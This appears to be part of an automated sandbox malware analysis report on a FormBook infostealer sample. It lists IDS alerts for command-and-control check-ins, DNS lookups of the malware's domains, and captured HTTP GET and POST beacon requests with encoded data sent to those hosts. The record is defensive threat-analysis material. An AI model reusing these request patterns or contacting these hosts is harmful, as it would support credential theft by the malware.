Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:53223 -> 217.70.184.50:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53253 -> 94.23.162.163:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53217 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:53256 -> 188.114.97.3:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:53255 -> 94.23.162.163:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53238 -> 65.21.196.90:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53228 -> 103.224.182.242:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:53101 -> 52.13.151.179:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53233 -> 209.74.64.187:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:53231 -> 103.224.182.242:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53240 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53230 -> 103.224.182.242:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53184 -> 103.106.67.112:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53252 -> 94.23.162.163:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53244 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53224 -> 94.23.162.163:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53236 -> 65.21.196.90:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:53196 -> 103.106.67.112:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53248 -> 8.210.49.139:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53232 -> 209.74.64.187:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:53239 -> 65.21.196.90:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53222 -> 217.70.184.50:80
Source: DNS query: www.sailforever.xyz
Source: DNS query: www.launchdreamidea.xyz
Source: DNS query: www.030002837.xyz
Source: DNS query: www.booosted.xyz
Source: Joe Sandbox View | IP Address: 209.74.64.187 209.74.64.187
Source: Joe Sandbox View | IP Address: 65.21.196.90 65.21.196.90
Source: Joe Sandbox View | ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
Source: Joe Sandbox View | ASN Name: VOYAGERNET-AS-APVoyagerInternetLtdNZ VOYAGERNET-AS-APVoyagerInternetLtdNZ
Source: Joe Sandbox View | ASN Name: MULTIBAND-NEWHOPEUS MULTIBAND-NEWHOPEUS
Source: Joe Sandbox View | ASN Name: CP-ASDE CP-ASDE
            Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\Doc 784-01965670.exe; Code function: 0_2_0044289D InternetQueryDataAvailable,InternetReadFile,0_2_0044289D
            Source: global traffic; HTTP traffic detected: HTTP/1.1 200 OKdate: Tue, 22 Oct 2024 20:58:17 GMTserver: Apacheset-cookie: __tad=1729630697.6660268; expires=Fri, 20-Oct-2034 20:58:17 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 582content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 c1 8e 9b 30 10 3d 87 af 18 b1 07 88 b6 0b 49 a3 b6 52 02 f4 50 a9 52 ab 1e aa dd f6 5c 39 66 08 4e c0 a6 f6 90 6c b4 ca bf 77 4c d8 ec b6 7b e8 72 49 6c bf 37 6f de 63 4c 56 53 db 14 41 56 a3 28 f9 87 14 35 58 6c d4 5e e9 8d 38 88 e3 fc ed 22 d1 48 59 7a 3e 08 32 27 ad ea 08 e8 d8 61 1e 12 de 53 ba 15 7b 71 de 0d c1 59 99 87 e9 d6 a5 15 f3 d1 76 56 69 4a 95 aa 30 69 95 4e b6 2e 2c b2 f4 8c fd 5f a9 22 d8 0b 0b 16 4b 65 51 d2 af 46 e9 1d e4 10 d5 44 dd 32 4d 0f 87 43 f2 a2 c9 74 be ed 65 fa 31 5a 05 41 9a c2 1d 12 08 20 d5 a2 e9 09 4c 05 8b d9 0c 5a 25 ad 71 28 8d 2e 1d 90 01 bc 47 d9 13 32 f0 51 09 54 05 54 23 3c 33 00 9d 35 ad 72 bc 27 54 e3 a0 32 16 9c 69 91 29 c2 19 1d 54 bd 96 a4 8c e6 e3 a6 59 0b b9 bb 1d 4b c5 53 78 08 26 07 a5 4b 73 48 1a 23 85 47 25 16 bb 46 48 8c ff b2 76 1d 55 5d 7e f3 21 9a ae 82 53 10 90 3d 7a 26 77 e9 08 6c 69 7f 8c 26 72 70 48 e3 22 fe 57 ed 8d 37 c8 fc 89 cf ad ea be 8f 3d e7 f0 f9 c9 c9 d7 3b ee 43 94 f1 43 6b b4 22 c3 5b 9b a5 6f db e1 c9 33 2f ac 60 32 49 38 04 1d 57 1d e4 05 57 4b 36 c8 76 a6 97 7d fe 33 b1 e8 fa 86 fc f9 03 f8 f5 28 6c 7d 9f de 4e 74 7d 46 24 7b e5 bc d8 97 72 35 c0 64 83 e2 d1 52 fc e4 6e 7a 3e 7d 5d 5c 5e 66 20 f8 be 4f c0 58 59 c7 68 ed 90 f8 cb f7 30 a4 fa 7c f2 e8 c8 c3 0c 6b 53 72 d0 e0 b1 1b 6b 7a 5d 2e af e6 b3 b9 5c bc 87 13 30 7a 00 31 6d bc 1a 03 7a bd 91 a6 31 36 0f af aa e1 09 c1 0f 2e 2f 67 c3 c3 63 9b 95 6a 0f 03 37 8f 4a e5 b8 fb e3 12 b4 d1 b8 8a 8a 4c 40 6d b1 ca 5f 33 c6 7e 20 16 51 f1 a9 51 72 07 35 5a 1c e6 55 13 da 2c 15 7c 8d 58 86 c5 b4 19 4d 65 2d 12 57 e7 ba 37 f8 bb 57 fb 3c 64 21 7e 01 75 08 3c 47 c4 c4 3c 9c ad e0 e7 ed b7 fc 95 e2 ef fc 65 bd d4 e7 1c 7c 00 43 1e fe 8b f1 07 e8 99 28 63 38 04 00 00 Data Ascii: T0=IRPR\9fNlwL{rIl7ocLVSAV(5Xl^8"HYz>2'aS{qYvViJ0iN.,_"KeQFD2MCte1ZA LZ%q(.G2QTT#<35r'T2i)TYKSx&KsH#G%FHvU]~!S=z&wli&rpH"W7=;CCk"[o3/`2I8WWK6v}3(l}Nt}F${r5dRnz>}]\^f OXYh0|kSrkz].\0z1mz16./gcj7JL@m_3~ QQr5ZU,|XMe-W7W<d!~u<G<e|C(c8
            Source: global traffic; HTTP traffic detected: HTTP/1.1 200 OKdate: Tue, 22 Oct 2024 20:58:19 GMTserver: Apacheset-cookie: __tad=1729630699.8206090; expires=Fri, 20-Oct-2034 20:58:19 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 582content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 c1 8e 9b 30 10 3d 87 af 18 b1 07 88 b6 0b 49 a3 b6 52 02 f4 50 a9 52 ab 1e aa dd f6 5c 39 66 08 4e c0 a6 f6 90 6c b4 ca bf 77 4c d8 ec b6 7b e8 72 49 6c bf 37 6f de 63 4c 56 53 db 14 41 56 a3 28 f9 87 14 35 58 6c d4 5e e9 8d 38 88 e3 fc ed 22 d1 48 59 7a 3e 08 32 27 ad ea 08 e8 d8 61 1e 12 de 53 ba 15 7b 71 de 0d c1 59 99 87 e9 d6 a5 15 f3 d1 76 56 69 4a 95 aa 30 69 95 4e b6 2e 2c b2 f4 8c fd 5f a9 22 d8 0b 0b 16 4b 65 51 d2 af 46 e9 1d e4 10 d5 44 dd 32 4d 0f 87 43 f2 a2 c9 74 be ed 65 fa 31 5a 05 41 9a c2 1d 12 08 20 d5 a2 e9 09 4c 05 8b d9 0c 5a 25 ad 71 28 8d 2e 1d 90 01 bc 47 d9 13 32 f0 51 09 54 05 54 23 3c 33 00 9d 35 ad 72 bc 27 54 e3 a0 32 16 9c 69 91 29 c2 19 1d 54 bd 96 a4 8c e6 e3 a6 59 0b b9 bb 1d 4b c5 53 78 08 26 07 a5 4b 73 48 1a 23 85 47 25 16 bb 46 48 8c ff b2 76 1d 55 5d 7e f3 21 9a ae 82 53 10 90 3d 7a 26 77 e9 08 6c 69 7f 8c 26 72 70 48 e3 22 fe 57 ed 8d 37 c8 fc 89 cf ad ea be 8f 3d e7 f0 f9 c9 c9 d7 3b ee 43 94 f1 43 6b b4 22 c3 5b 9b a5 6f db e1 c9 33 2f ac 60 32 49 38 04 1d 57 1d e4 05 57 4b 36 c8 76 a6 97 7d fe 33 b1 e8 fa 86 fc f9 03 f8 f5 28 6c 7d 9f de 4e 74 7d 46 24 7b e5 bc d8 97 72 35 c0 64 83 e2 d1 52 fc e4 6e 7a 3e 7d 5d 5c 5e 66 20 f8 be 4f c0 58 59 c7 68 ed 90 f8 cb f7 30 a4 fa 7c f2 e8 c8 c3 0c 6b 53 72 d0 e0 b1 1b 6b 7a 5d 2e af e6 b3 b9 5c bc 87 13 30 7a 00 31 6d bc 1a 03 7a bd 91 a6 31 36 0f af aa e1 09 c1 0f 2e 2f 67 c3 c3 63 9b 95 6a 0f 03 37 8f 4a e5 b8 fb e3 12 b4 d1 b8 8a 8a 4c 40 6d b1 ca 5f 33 c6 7e 20 16 51 f1 a9 51 72 07 35 5a 1c e6 55 13 da 2c 15 7c 8d 58 86 c5 b4 19 4d 65 2d 12 57 e7 ba 37 f8 bb 57 fb 3c 64 21 7e 01 75 08 3c 47 c4 c4 3c 9c ad e0 e7 ed b7 fc 95 e2 ef fc 65 bd d4 e7 1c 7c 00 43 1e fe 8b f1 07 e8 99 28 63 38 04 00 00 Data Ascii: T0=IRPR\9fNlwL{rIl7ocLVSAV(5Xl^8"HYz>2'aS{qYvViJ0iN.,_"KeQFD2MCte1ZA LZ%q(.G2QTT#<35r'T2i)TYKSx&KsH#G%FHvU]~!S=z&wli&rpH"W7=;CCk"[o3/`2I8WWK6v}3(l}Nt}F${r5dRnz>}]\^f OXYh0|kSrkz].\0z1mz16./gcj7JL@m_3~ QQr5ZU,|XMe-W7W<d!~u<G<e|C(c8
            Source: global traffic; HTTP traffic detected: HTTP/1.1 200 OKdate: Tue, 22 Oct 2024 20:58:22 GMTserver: Apacheset-cookie: __tad=1729630702.4699844; expires=Fri, 20-Oct-2034 20:58:22 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 582content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 c1 8e 9b 30 10 3d 87 af 18 b1 07 88 b6 0b 49 a3 b6 52 02 f4 50 a9 52 ab 1e aa dd f6 5c 39 66 08 4e c0 a6 f6 90 6c b4 ca bf 77 4c d8 ec b6 7b e8 72 49 6c bf 37 6f de 63 4c 56 53 db 14 41 56 a3 28 f9 87 14 35 58 6c d4 5e e9 8d 38 88 e3 fc ed 22 d1 48 59 7a 3e 08 32 27 ad ea 08 e8 d8 61 1e 12 de 53 ba 15 7b 71 de 0d c1 59 99 87 e9 d6 a5 15 f3 d1 76 56 69 4a 95 aa 30 69 95 4e b6 2e 2c b2 f4 8c fd 5f a9 22 d8 0b 0b 16 4b 65 51 d2 af 46 e9 1d e4 10 d5 44 dd 32 4d 0f 87 43 f2 a2 c9 74 be ed 65 fa 31 5a 05 41 9a c2 1d 12 08 20 d5 a2 e9 09 4c 05 8b d9 0c 5a 25 ad 71 28 8d 2e 1d 90 01 bc 47 d9 13 32 f0 51 09 54 05 54 23 3c 33 00 9d 35 ad 72 bc 27 54 e3 a0 32 16 9c 69 91 29 c2 19 1d 54 bd 96 a4 8c e6 e3 a6 59 0b b9 bb 1d 4b c5 53 78 08 26 07 a5 4b 73 48 1a 23 85 47 25 16 bb 46 48 8c ff b2 76 1d 55 5d 7e f3 21 9a ae 82 53 10 90 3d 7a 26 77 e9 08 6c 69 7f 8c 26 72 70 48 e3 22 fe 57 ed 8d 37 c8 fc 89 cf ad ea be 8f 3d e7 f0 f9 c9 c9 d7 3b ee 43 94 f1 43 6b b4 22 c3 5b 9b a5 6f db e1 c9 33 2f ac 60 32 49 38 04 1d 57 1d e4 05 57 4b 36 c8 76 a6 97 7d fe 33 b1 e8 fa 86 fc f9 03 f8 f5 28 6c 7d 9f de 4e 74 7d 46 24 7b e5 bc d8 97 72 35 c0 64 83 e2 d1 52 fc e4 6e 7a 3e 7d 5d 5c 5e 66 20 f8 be 4f c0 58 59 c7 68 ed 90 f8 cb f7 30 a4 fa 7c f2 e8 c8 c3 0c 6b 53 72 d0 e0 b1 1b 6b 7a 5d 2e af e6 b3 b9 5c bc 87 13 30 7a 00 31 6d bc 1a 03 7a bd 91 a6 31 36 0f af aa e1 09 c1 0f 2e 2f 67 c3 c3 63 9b 95 6a 0f 03 37 8f 4a e5 b8 fb e3 12 b4 d1 b8 8a 8a 4c 40 6d b1 ca 5f 33 c6 7e 20 16 51 f1 a9 51 72 07 35 5a 1c e6 55 13 da 2c 15 7c 8d 58 86 c5 b4 19 4d 65 2d 12 57 e7 ba 37 f8 bb 57 fb 3c 64 21 7e 01 75 08 3c 47 c4 c4 3c 9c ad e0 e7 ed b7 fc 95 e2 ef fc 65 bd d4 e7 1c 7c 00 43 1e fe 8b f1 07 e8 99 28 63 38 04 00 00 Data Ascii: T0=IRPR\9fNlwL{rIl7ocLVSAV(5Xl^8"HYz>2'aS{qYvViJ0iN.,_"KeQFD2MCte1ZA LZ%q(.G2QTT#<35r'T2i)TYKSx&KsH#G%FHvU]~!S=z&wli&rpH"W7=;CCk"[o3/`2I8WWK6v}3(l}Nt}F${r5dRnz>}]\^f OXYh0|kSrkz].\0z1mz16./gcj7JL@m_3~ QQr5ZU,|XMe-W7W<d!~u<G<e|C(c8
            Source: global traffic; HTTP traffic detected: GET /qw71/?DrelH=+N/0E0v6NJCVb805MplOCuiY6zvMpGzoX4nqdcW8deD1xdZOlnbQg5vou9xNSSthlFMWUYds/nxA/0yqGkfxHl13RnV9fZ86lxbh4XUe9xgDJH4eQTI99hcUlaXwNdeqKg==&Sx=gnM4ZH HTTP/1.1Host: www.itemsort.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
            Source: global traffic; HTTP traffic detected: GET /t7t4/?DrelH=JME/FbwkkQiTLR8EmPe57WZ7VagZp8tJ+vLJvTOCgHppMKWbYWfaRFz4/PgkMvknA1YharU87nKdOM/7k7q3IkusQQuIzTW/Q+d1GThbq9ZzxZjoWmxr4FVA7qWfBnIN3A==&Sx=gnM4ZH HTTP/1.1Host: www.rudemyvague.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
            Source: global traffic; HTTP traffic detected: GET /hshp/?DrelH=MBiESr0hPmgVFuSDgT1s92jewHX1Ts8BjfLus90OagNghP1boqy5GATWCckP72R/Mt6dwrAbNlxqg3zWk6ZAL3I79JNkUMXvu17ad0+/aKhabOpL3xv01zQ1Ix9cEL3WZA==&Sx=gnM4ZH HTTP/1.1Host: www.sailforever.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
            Source: global traffic; HTTP traffic detected: GET /bd77/?Sx=gnM4ZH&DrelH=qUcYNRi6MmsiGKriyom62ti4lIWHctjIcWj4n4RDTJ9SK0tIDWNU+4/fdEnUeQPlIjs5HOj1IjY+OoVWBoHCyUpz7x/SzvZhSZv0Dea0KcHBDKlEtGKZJ6Ek0LYLRuKiHQ== HTTP/1.1Host: www.launchdreamidea.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
            Source: global traffic; HTTP traffic detected: GET /t10u/?DrelH=z2kOE6Hdw1U1MLXnqmWT9va9e3/8+PVtvvr0x5hWEi4SF2SHBGm8gNhzQPXfz38/DYz+lgbjU03/S4gao0rDqDpJDn/FJZpyPS5de5f3CrWN+zQkLsrau7VMl+ksG9OKqA==&Sx=gnM4ZH HTTP/1.1Host: www.mondayigboleague.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
            Source: global traffic; HTTP traffic detected: GET /0bvj/?Sx=gnM4ZH&DrelH=JoV24jQMdS4/3i4B5lXW6wgXe871T9Ry+Ik40cffOJE8Oz5kZb+e/LE/tYolIRko14Bt2A58ujzBN0XKB7HYk+as1PFyE+cpyOrA06AWAI1QWZMBKp1vuYqItDMniQ0DBw== HTTP/1.1Host: www.stocksm.funAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
            Source: global traffic; HTTP traffic detected: GET /v2k8/?DrelH=XThEFIcSG6Rk+ek4TZakmC+nJJjAEcvsg7f4UZ5pblIcrBlS4WXKUvIR0hCzISiZvqIQ3m6PzA/XmcrRxXtM6qnxKBkcbq4MueVVV3XCfWAmAkUYQmNwrZeqvG2HfhRonQ==&Sx=gnM4ZH HTTP/1.1Host: www.drevohome.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
            Source: global traffic; HTTP traffic detected: GET /1juc/?DrelH=Sd7Ig8sUf85GUDOexfZI7d4fWBR1p2+PhIDwYHX4t/HDftDJcaAUS3ArkHQTdeUPxnR6CHdkZBdIayuX0k+D8s2i/Pv/RCSFWjqZ6c9XIS2ZXqJQLcds/lvq2BX8pMITrA==&Sx=gnM4ZH HTTP/1.1Host: www.givingaway123.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
            Source: global traffic; HTTP traffic detected: GET /qxse/?DrelH=rpts+huSPQ+pmLEcaktqX4OYLAiBGOxJ0LqkryefQtnAbXwhGMtouJAJNGxD75BBoIrDH5z7ykmTX7GRRg85P9Ge9YW+EOCG2iwxhwrHmW9o/3mDrh1ZK5nR7QXShQvwtw==&Sx=gnM4ZH HTTP/1.1Host: www.jagdud.storeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
            Source: global traffic; HTTP traffic detected: GET /y045/?Sx=gnM4ZH&DrelH=y1BC7gE5U9SjKVi4f+qVAHSx2lLKNXVMs/YJXs1dmV0xz4NUECnrQCoTHq2W+qQeH7vV4kPmjQT4fdprdSopc2q7pRx51jA4E/xrfKHMwg9y+RaF/+hNtwtULy/7l6WTkA== HTTP/1.1Host: www.030002837.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
            Source: global traffic; HTTP traffic detected: GET /m7sk/?DrelH=A6wDktXN+q8LbGsGA20DfX120LfCO8nuN87t6JZMO+a4oYZs/QR9AXcn2q3DsDkOv2Hc7Sq51OH+WlLaKJC80JPe0JQf+HZnvaZlGu7qv/1z0bLdCqC2RrE0forVuM7BfA==&Sx=gnM4ZH HTTP/1.1Host: www.ethetf.digitalAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
            Source: global traffic; HTTP traffic detected: GET /12c7/?Sx=gnM4ZH&DrelH=rkKrlAe8PM32Rlyr4yibAxDw7KGKKMI9ljR3Eqrj5cYHYbO4IgL/vCafVq76xsIWOM1RYR4h1usN6t6rhgLqOWVPblob6mrlgni+LdLmL1Exd/23ibR2hwRjCv5+3cT01Q== HTTP/1.1Host: www.booosted.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
            Source: global traffic; HTTP traffic detected: GET /0628/?DrelH=udVPsZZaektnpNC9MvhveAugnKqjqPi3CgpOVGQRV3GxzahYZeT2u+nvI8XmYm2tQXkKvM1/LtgNko72s5T+AigTeJIoAagnD1dxA2tH0NgWMQZxZA+Ob34DrkJtsSinzg==&Sx=gnM4ZH HTTP/1.1Host: www.djazdgc.tokyoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
            Source: global traffic; HTTP traffic detected: GET /9vwi/?Sx=gnM4ZH&DrelH=nzAHAMVHTcHZef2dtsV+gZN2Jg+zshsJ+9OWn5ktx4T+L9EMDtm05+R8HUsMmhIjUd2KUuTNFTfuNiAYWk32ZlZ5K0mO0jPWZdMrvyGAaZ//vvCziC5VbEt1mIxURveK1Q== HTTP/1.1Host: www.productanalytics.proAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
            Source: global traffic; HTTP traffic detected: GET /qw71/?DrelH=+N/0E0v6NJCVb805MplOCuiY6zvMpGzoX4nqdcW8deD1xdZOlnbQg5vou9xNSSthlFMWUYds/nxA/0yqGkfxHl13RnV9fZ86lxbh4XUe9xgDJH4eQTI99hcUlaXwNdeqKg==&Sx=gnM4ZH HTTP/1.1Host: www.itemsort.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
            Source: global traffic; DNS traffic detected: DNS query: 50.23.12.20.in-addr.arpa
            Source: global traffic; DNS traffic detected: DNS query: www.itemsort.shop
            Source: global traffic; DNS traffic detected: DNS query: www.rudemyvague.info
            Source: global traffic; DNS traffic detected: DNS query: www.gws-treinamento2.shop
            Source: global traffic; DNS traffic detected: DNS query: www.sailforever.xyz
            Source: global traffic; DNS traffic detected: DNS query: www.launchdreamidea.xyz
            Source: global traffic; DNS traffic detected: DNS query: www.mondayigboleague.info
            Source: global traffic; DNS traffic detected: DNS query: www.stocksm.fun
            Source: global traffic; DNS traffic detected: DNS query: www.drevohome.shop
            Source: global traffic; DNS traffic detected: DNS query: www.givingaway123.net
            Source: global traffic; DNS traffic detected: DNS query: www.jagdud.store
            Source: global traffic; DNS traffic detected: DNS query: www.030002837.xyz
            Source: global traffic; DNS traffic detected: DNS query: www.ethetf.digital
            Source: global traffic; DNS traffic detected: DNS query: www.booosted.xyz
            Source: global traffic; DNS traffic detected: DNS query: www.djazdgc.tokyo
            Source: global traffic; DNS traffic detected: DNS query: www.productanalytics.pro
            Source: global traffic; DNS traffic detected: DNS query: www.kmjai8jf.icu
            Source: unknown; HTTP traffic detected: POST /t7t4/ HTTP/1.1Host: www.rudemyvague.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,enOrigin: http://www.rudemyvague.infoReferer: http://www.rudemyvague.info/t7t4/Content-Length: 206Content-Type: application/x-www-form-urlencodedConnection: closeCache-Control: max-age=0User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36Data Raw: 44 72 65 6c 48 3d 45 4f 73 66 47 75 4e 45 7a 67 6d 2f 56 6e 6f 42 37 71 2b 53 35 7a 5a 65 62 2f 30 50 68 4d 5a 61 38 4f 6a 57 76 43 65 74 76 46 49 62 66 74 4f 6d 4f 6d 72 37 51 51 2f 4f 70 66 56 39 4e 64 49 61 50 56 55 39 51 35 63 35 70 6e 53 6d 5a 4a 37 63 6f 2f 6d 58 4e 58 71 65 61 43 69 72 6a 54 32 67 64 2b 73 39 48 51 70 71 72 36 64 39 72 61 6e 2b 52 47 42 58 37 56 56 69 2f 75 75 64 62 33 42 37 6c 34 30 4c 30 51 52 51 30 2b 6f 48 77 50 59 6c 69 45 79 79 2b 34 41 59 38 4d 6d 4a 4c 46 41 53 63 55 54 7a 48 5a 2f 52 50 4f 65 6e 59 30 73 5a 54 4d 49 30 4b 6e 59 44 72 2b 6b 6c 4a 47 6b 